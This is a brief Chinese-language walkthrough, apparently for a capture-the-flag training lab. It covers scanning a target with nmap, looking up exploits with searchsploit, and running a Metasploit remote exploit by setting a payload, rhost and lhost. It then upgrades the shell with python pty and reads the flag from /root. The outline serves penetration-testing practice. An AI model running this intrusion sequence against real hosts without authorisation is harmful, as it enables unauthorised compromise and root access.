
信息探测
扫描主机服务信息以及服务版本
nmap -sV 靶场IP地址
快速扫描主机全部信息
nmap -T4 -A -v 靶场IP地址
- nmap:扫描工具
- -T4:以最快速度扫描
- -A:加载所有扫描模块进行扫描
- -v:返回探测的所有详细信息(包括发送数据包,靶场响应数据包)
发现漏洞
分析nmap扫描结果,并对结果进行分析,挖掘可以利用的信息;
使用seachspliot,查看漏洞信息,找到可利用的溢出代码;
使用metasploit进行溢出
打开metasploit在终端中输入msfconsole
输入search对应的软件及版本号
使用exploit
use exploit
查看可以使用的payload
show payload
设置payload
set payload
设置参数
show options
set rhost 被攻击机IP
set lhost 攻击机IP
进行远程溢出
exploit
执行命令
id
优化shell
使用python pty开启终端
python -c "import pty;pty.spawn('/bin/bash')"
获取flag
一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd /root/
ls
cat flag
总结
对于开放FTP,SSH,Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码;
对于系统,一定要注意利用现成的EXP来root主机;